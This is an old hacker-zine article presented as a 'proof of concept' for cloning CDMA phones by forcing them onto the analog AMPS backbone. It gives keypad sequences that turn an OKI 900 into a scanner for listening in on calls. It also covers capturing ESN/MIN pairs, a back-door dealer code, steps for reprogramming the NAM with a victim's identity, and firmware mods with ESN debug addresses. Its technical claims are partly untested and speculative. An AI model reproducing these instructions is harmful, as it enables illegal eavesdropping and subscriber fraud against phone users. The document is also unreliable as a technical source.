Proof Of Concept: 'Forced Analog Transmission Workaround' of the CDMA network

Note: The information within this article is published for INFORMATION PURPOSES ONLY. The use of any or all of the following information can be considered HIGHLY ILLEGAL. You have been warned.

By: Ezekial (of Avatar235)

After doing a lot of research and a bit of help from Av1,
Av4 and a number of Avatar235's friends I have come to the
conclusion that the Australian CDMA network structure is
insecure. This document will describe (in layman's terms)
a method that can be used to Clone (copy) another CDMA
phone wirelessly and in an unintrusive manner (ie. sneakyness).

***Cloning.

Cloning of mobile phones is the activity of copying the
subscriber information from one phone onto the other for
purposes of obtaining free calls. This is done by reprogramming
an empty CDMA compatible phone (you can do a Factory reset to
empty them) with the 'victims' ESN (Electronic Serial Number)
and MIN (Mobile Information Number. Getting these numbers can
be tricky unless you have physical access to the victim's phone.

***Eavesdropping.

Eavesdropping is simply the act of listening in on a conversation
over the network from your mobile phone. See the next section
for details on which phones can be used.

***The infamous OKI.

The oki 900 cellular phone is one of the if not the most
modifiable cellular telephone in the world. It is based
around an 8051 microprocessor, and the main program is
stored on a 27C512 eprom. Oki reproduced it's popular
model 900 cellular phone for AT&T under the model AT&T 3730.
Both are identical in appearance and in circuitry. The 900
operates off of 6 volts, either from a ni-cad battery or one
of two types of battery eliminators . The 900's antenna is an
sma connector.

This phone (the 900) was the basis of most cellular hacks in
the time of AMPS system structure in the US (and still is due
to poor upgrading of network structure. But don't be fooled,
not all OKIs are able to do the things described in this file.
The phones compatible with the functions described herein are:
OKI 900, 1150, 1325, and 1335.

None of these phones were for sale within Australia from
memory. You may be able to find similar functioning phones
in Aus like a number of Motorola Phones, but I have no
interest in these 'lower class phones'.

***Forced Analog Transmission (FAT).

Forced Analog transmission is where the CDMA network
is congested to such a level that any new phones to
enter the Cell area are connected to the AMPS (analog)
backbone system of the Telecommunication Corporations.
This sub-network is in use everyday by employees of the
Telcos and even by your GSM and CDMA mobiles.

How is it used? Well, when ever you are out of normal
coverage on your GSM phone your phones on-screen status
should display 'Emergency calls only' or similar, this
status is your GSM mobile transferring over to the AMPS
backbone network. GSM for some reason does not transfer
over to the Backbone when it encounters congestion possibly
because of the encryption differences or the fact that the
GSM system is fairly reliable, don't qoute me on this.

So anyway, your victims CDMA phone tranfers it's ESN/MIN
set over to the Backbone for authentication via CDMA's
standardized CAVE (Cellular Authentication and Voice Encryption),
this algorithm generates a 128-bit sub-key called the
“Shared Secret Data” (SSD).

The A-Key, the ESN and the network-supplied RANDSSD are
the inputs to the CAVE that generates SSD. The SSD has
two parts: SSD_A (64 bit), for creating authentication
signatures and SSD_B (64 bit), for generating keys to
encrypt voice and signaling messages (voice encryption is not done when over FAT) .

The SSD can be shared with roaming service providers
to allow local authentication. A fresh SSD can be
generated when a mobile returns to the home network
or roams to a different system.

I'm guessing most people here are thinking
'What the hell did that mean?' Simply the
data for Network Identication of the mobile
is sent to the MSC (Mobile Switching Centre)
for authentication before 'pairing' the phone
to the system.

The trick is that the ESN/MIN data is NOT encrypted on
the way to the MSC for further authentication. So you
can scan the airwaves for this data if you wish to clone
a phone (after decoding the bitstream and re-encoding
via software/hardware).

***Scanning the waves.

There are two purposes for scanning:

1. Eavesdropping.

Using an OKI described earlier, you will need to do the following:

Power on phone and immediately hold 7 + 9 at the
same time while it boots up for about two seconds.

Release 7 + 9 and hit Menu, Send, End, Recall,
Store, Clear and the phone should read good
timing!!!

If all goes well hit 1 + 3 at the same time to clear
the prompt.

Now hit #12 SND to recieve audio.

Then hit #77 SND and you should hear a buzzing
noise because you have just enabled the loud
speaker.

Ok, now to begin the scanning of channels enter
the following command:

#73AAAABBBBCC SND
AAAA = 4 digit low channel number (Channel to begin scan on)
BBBB = 4 digit high channel (Cell Channel to end scan on)
CC = 2 digit number for how many seconds to scan each channel

For example if you want to scan channels 50-300 at a
1 second interval you would enter:

#730050030001 SND and your scan should begin.

Press # when you find a channel with someone talking
you want to listen to and press # again to resume scanning.
Press * to restart the scan.

Now if you only want to listen to a specific channel
on a lower volume just enter this instead:

#12 SND
#76 SND to turn the receiver on
#09SND to select channel you want to listen on.

2. Snatching Pairs.

Now sometimes you will come across a channel that
is widely described as 'Hornets/Bees Buzzing'. This
is the encoded ESN/MIN pair. The OKI series described
has a headphone jack so you can plug this into your computer
to record and decode. I will not go into decoding here, as
this is only a proof of concept, NOT a trainer in Electronic
Identity Theft.

If you wish to build some devices that can scan the airwaves
there is a book out by the author Rudolf F. "Rudy" Graham,
called the Encyclopedia of Electronic Projects, Vol 7. Has
everything you would want to know about electronic serveilence
EXCEPT the holy grail, GSM Intercepting.

***Cloning from your Snatched Pair

You will need to follow these instructions to the letter, a
s this is very tricky stuff and could ruin your phone.

The ESN/MIN pair is called the NAM, this is what you
will need to program using these intructions:

1. Turn power on.

2. Within 30 seconds press RCL & MENU keys together and release, enter
* 1 2 3 4 5 6 7 8 #, (or enter dealer password if one has been used).

NOTE: If the dealer password is unknown and the factory default does not
work use the following "back door" code: * 6 2 7 2 9 8 5 4 #.

3. The phone will then display the Software Version followed by the
ESN in hex

NOTE: If you used the dealer password successfully in step 2 go straight
to step 5 below.

4. The phone will display "ENTER NEW PW AND STO" you may enter a ten digit
password at this stage to be used in future re-programings. Press
STO to retain default password or enter a ten digit password and press STO.

5. The phone will display "RE-ENTER PW AND STO" re-enter the password, press
STO to confirm. Again, press STO to retain default password.

6. The following "re-set" options can be bypassed by pressing volume down
to scroll. Each step is followed two seconds later by "Press * to Clear",
you can either press * or press CLR to bypass.

Step# Display Action

01 SSN# Wait 2 seconds.
Press * to Reset Press * to clear social security (not used)
02 SPD MEM CLR Wait 2 seconds.
Press * to Reset Press * to initialize speed dial memories.
03 DEFAULT DATA SET Wait 2 seconds.
Press * to Reset Press * to initialize unit.
POWER ON MESSAGE Wait 2 seconds.
Enter ALPHA Enter up to 8 characters followed by STO,
or press CLR to bypass.

7. The STO key stores each entry.

8. The Volume UP key scrolls down through the steps.

9. The Volume DOWN key scrolls UP through the steps.

10. At any time press CLR to exit program mode. Phone will display
"NAM x Program" press CLR to exit, or continue with additional NAMS.
You may also go directly to any NAM by pressing Volume Down when phone
displays "NAM x Program". NAM's 2 through 5 only have steps 01 - 06
below.

PROGRAMMING DATA:

STEP# #OF DIGITS/RANGE DISPLAY DESCRIPTION

01 10 DIGITS Own# MIN (AREA CODE & PHONE NUMBER)
02 5 DIGITS System ID SYSTEM ID
03 4 DIGITS IPCH NO. IPCH AUTOMATICALLY SET
04 2 DIGITS ACCOLCC ACCESS OVERLOAD
05 2 DIGITS GIM GROUP ID (10 FOR USA)
06 3 OR 4 DIGITS Unlock LOCK CODE
07 4 DIGITS SCM STATION CLASS MARK, USE 1000.
08 4 DIGITS/0 OR 1 OPTION OPTION BITS:
1 enables, from left to right:
MIN Mark
Hands Free
Local Use
NOT USED
9 6 DIGITS SECURITY SECURITY CODE (DEFAULT IS LAST
SIX DIGITS OF ESN)

***Enhancing your OKI.

13. OKI 900 Modifications

Several software modifications exist, below is a
list and an explanation of each. These mods are
to be burned into the 27c512 SOIC chip inside the
OKI 900. They are 150ns 28 pin SOIC chips. An SOIC
adapter will be required, and can probably be aquiered
through the same place you got your burner. This chip
is located on the same side and same board as the lcd,
in the lower left hand corner.

4701 - The original mod, holds 5 ESN programmed byte by byte.
4711 - Update to the 4701 (fixed bugs).
4712 - The most popular and least buggy mod. Works well with C-TEK (See 'C-tek' next section).

Change ESN: (for all above mods)

Press MENU 8 times, until you see ADM menu.
Press RCL and enter 123456
Use RCL to move from one ESN to another,
and STO to save your options.
REBOOT Phone!!!!!

Enter Debug Mode:

ESN Number Address
--------------------------------
ESN Location #1 $BE8E-$BE91
ESN Location #2 $BE93-$BE96
ESN Location #3 $BE98-$BE9B
ESN Location #4 $BE9D-$BEA0
ESN location #5 $BEA2-$BEA5

Key:
#54 XXXX xx
| | |
| | In order, one thru four bytes of ESN
| |
| Address (Location)
|
The write byte debug command

To use the 0-9 keys, just use 0-9, to access A-F, hit STAR ("*")
before 1-6 for A-F. The "*" key can be thought of as a shift key.
If you hit the "*" twice, it will act as if you did not hit the "*"
at all.

Program NAM:

Enter RCL + MENU, *, 6, 2, 7, 2, 9, 8, 5, 4, #
you can then use the up and down keys to scroll through the
information and change the appropriate nam.

4715 - Newest widely available mod. Should work with C-TEK
This mod will allow you to use 230 ESNs and set a number
of times each ESN can be used before auto deletion. Each NAM
must be programmed manually.

I have data relating to these mods and can be given on request.

The actual microcontroler is an 8051 derivitave, and a lot of
information on programming it can be found on the Internet.

***C-TEK.

Cellular Telephone Experimenters Kit for the OKI-900/1150

The Cellular Telephone Experimenters Kit allowscontrol of a cellular
telephone from a personal computer. The Kit connects any DOS-based PC
with a serial port to an OKI-900/1150 phone.

The kit is designed for technicians, students, professionals,
hobbyists, and others interested in using, learning, repairing,
and experimenting with cellular telephone technology.

The kit consists of an interface adapter, software and manual. The
interface adapter converts the cellular phone's proprietary interface to a
standard RS-232 interface, and allows connection of external audio signals
to the cellular phone. The interface is not designed for data transmission
over the cellular system.

The kit includes the cellular telephone interface adapter; a manual and a
short cellular tutorial; four programs; a programming library and
documentation; and cellular related informational files.

One program is designed for testing the phone and allows a technician to
activate many of the OKIs built in test modes and functions, such as tuning
to a particular channel, activating carrier, sat, signaling tones, etc.

Another program can be used to access the phone's user features, such as
programming NAMs, or uploading, downloading and editing the phone's 200
alphanumeric telephone number memories on the PC.

A programming library object module is supplied to allow you to write your
own programs to access the phone in both normal operating mode and in test
mode. The library contains functions such as tuning to a channel, turning
carrier/audio/sat-tones/signaling-tones on and off, reading received
signal strength, sending and receiving digital control messages, and
sending and decoding DTMF tones.

Two programs are supplied in source form that give examples of writing
applications in either of these modes. One of these programs shows how the
PC can completely control the cellular phone, making and receiving calls
while the phone is only operating in its test mode, with the PC handling
all of the cellular protocol and messaging functions. The other program
simply controls the phone by simulating presses on its keypad from the PC.

All code and libraries were compiled using Borland Turbo C 2.0 running
under DOS.

NOTE: The OKI 1335 Does not require the C-Tek Dongle Interface
cable, it is already RS-232 compliant :).

I have the schematics for a hacked version of
the C-Tek and sample software for learning to
program your OKI yourself.

***Software.

CIA-SCAN: fvoc and dtmf display via c-tek (does more)
Various other c-tek applications exist, mail me your list, and the files
and I will include them.

Scan1c: This appears to be an update to CIA SCAN. It has a graph of
signal strengths and most of the same features as CIA but with better
control, and can scan both forward, and backwards.

Please let me know of any additional Software you find for the OKI.

***Conclusion.

This is only a proof of concept. I do not condone Electronic Identity Theft.

When I recieve my OKI 1335 from the US I will re-write this doc with pictures and make it a PDF.

Note: I just went off on a tangent with this doc and forgot to say that you will need to enter the ESN/MIN pair
into an empty CDMA phone. I have not tested using the OKI for
Forced Analog Transmission as standard. Sorry Guys.

1.) Basic Social Engineering Defense 101 - Israel
2.) How to Plan for a Possible Network Attack - Robert J. Shimonski.
3.) Brute Force - The Attackers Last Resort - Lineman
4.) X2 Free SMS Exploit - Ninja
5.) Proof Of Concept: 'Forced Analog Transmission Workaround' of the CDMA network - Ezekial
6.) Fun with Call Forwarding - Ninja